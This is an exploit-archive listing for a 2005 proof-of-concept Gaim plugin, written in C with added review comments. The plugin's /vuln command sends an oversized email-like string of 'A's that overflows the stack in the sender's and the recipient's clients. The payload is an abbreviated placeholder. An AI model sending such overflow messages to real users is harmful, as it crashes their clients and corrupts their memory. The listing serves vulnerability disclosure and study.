
gaimpoc.c

gaimpoc.c
Posted May 27, 2005
Authored by Ron

GAIM 1.2.x URL handling remote buffer overflow proof of concept exploit.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 7848d3161cbdedd627a1264584866ef1ecae57e20a4c30b79437a3d05ca0bf88

gaimpoc.c

// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack-based buffer overflow
// when processing email addresses. What this basically does is segfault your own
// client when you do a /vuln command in a conversation, and, if you're using a
// protocol that allows a 10002-character message to go through, also segfaults the
// person you sent it to. The reason is that gaim's stack is overwritten with a whole
// bunch of 'A's, and the return address of the function ends up at 0x41414141
// (0x41 is ASCII 'A'). In other words, the saved return address is taken from
// message data, so this is memory corruption and not just a crash. That's no good
// for anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

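/* Short label for this test plugin; not referenced anywhere else in this listing. */
#define ME "1.2.1 Vuln Check"

/* Size constant; not referenced anywhere else in this listing. */
#define MAXLENGTH 1024

/*
 * Free-text description of the plugin; also unreferenced in this listing.
 * The literal has to stay on one physical line: a #define ends at the newline
 * and a string literal cannot span lines, so the wrapped form leaves an
 * unterminated string plus stray tokens at file scope.
 * NOTE(review): the XMMS_ prefix does not match this plugin and looks like a
 * leftover from whatever plugin was used as a template.
 */
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."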

/*
 * Message text that the /vuln command sends. As published this is an
 * abbreviated placeholder: "...(A*8192)..." stands in for a long run of 'A'
 * bytes and is not itself that long. The '@' gives the text the shape of an
 * email address, which is the input the header comment says Gaim 1.2.1
 * mishandles. For detection, the relevant pattern is a single address-like
 * token thousands of bytes long inside an instant message.
 */
char *code = "A@AAAA...(A*8192)...AAAAA";

/* Id returned by gaim_cmd_register() in plugin_load(); plugin_unload() passes it back. */
static GaimCmdId cmd;

/*
 * Callback for the "/vuln" command: sends the file-scope `code` string as an
 * ordinary IM on the conversation the command was typed in.
 *
 * Nothing in this function overflows anything. Per the header comment, the
 * fault is in how the Gaim client processes the message text, which is why
 * both the sender and (if the protocol carries the message) the recipient
 * are affected.
 *
 * conv  - conversation the command was issued in
 * cmd   - command name as typed (unused; note it shadows the file-scope `cmd`)
 * args  - command arguments (unused)
 * error - error-message out parameter (unused, never written)
 * data  - registration user data (unused)
 *
 * Returns GAIM_CMD_STATUS_OK unconditionally.
 * NOTE(review): the function is declared gboolean but returns a GAIM_CMD_*
 * status and is registered through a (GaimCmdFunc) cast; confirm the declared
 * return type against GaimCmdFunc in cmds.h.
 */
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args,
            gchar **error, void *data)
{
    const char *message = code;

    /* Only the conversation is needed; the other callback arguments are ignored. */
    (void)cmd;
    (void)args;
    (void)error;
    (void)data;

    gaim_conv_im_send(GAIM_CONV_IM(conv), message);

    return GAIM_CMD_STATUS_OK;
}

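/*
 * Load hook: registers the "/vuln" command for IM conversations with go() as
 * its handler and stores the returned id in the file-scope `cmd`.
 *
 * plugin - the plugin being loaded (unused)
 *
 * Returns TRUE when the command was registered, FALSE otherwise.
 */
static gboolean plugin_load(GaimPlugin *plugin)
{
    (void)plugin;

    cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT,
                            GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

    /*
     * gaim_cmd_register() yields 0 on failure. Report that to the plugin
     * loader instead of claiming success with no command installed.
     */
    return cmd != 0;
}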

/*
 * Unload hook: removes the "/vuln" command using the id saved in the
 * file-scope `cmd` by plugin_load().
 *
 * plugin - the plugin being unloaded (unused)
 *
 * Always returns TRUE.
 */
static gboolean plugin_unload(GaimPlugin *plugin)
{
    (void)plugin;

    gaim_cmd_unregister(cmd);

    return TRUE;
}

/*
 * Plugin descriptor handed to GAIM_INIT_PLUGIN at the end of the file.
 * The initializer is positional, so the order of the entries below is
 * significant and must follow the GaimPluginInfo layout.
 */
static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
/* No plugin id is supplied. */
NULL, /**< id */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/* Summary and description are empty strings, so the descriptor itself does not say what the plugin does. */
/** summary */
N_(""),
/** description */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage */

/* Hooks: load registers the /vuln command, unload removes it. */
plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */

NULL, /**< ui_info */
NULL, /**< extra_info */
/* NOTE(review): the two trailing entries are unlabelled in the original; confirm which GaimPluginInfo fields they fill against plugin.h. */
NULL,
NULL
};


/*
 * Init hook named in the GAIM_INIT_PLUGIN invocation. The body is empty:
 * all of this plugin's setup happens in plugin_load().
 *
 * plugin - the plugin being initialised (unused)
 */
static void init_plugin(GaimPlugin *plugin)
{
    (void)plugin;
}

/*
 * Plugin entry-point macro, given the init hook and the descriptor defined above.
 * NOTE(review): the first argument is "XMMSPlugin", which does not match this
 * plugin and looks copied from another plugin's source; confirm how the macro
 * uses that name before changing it.
 */
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
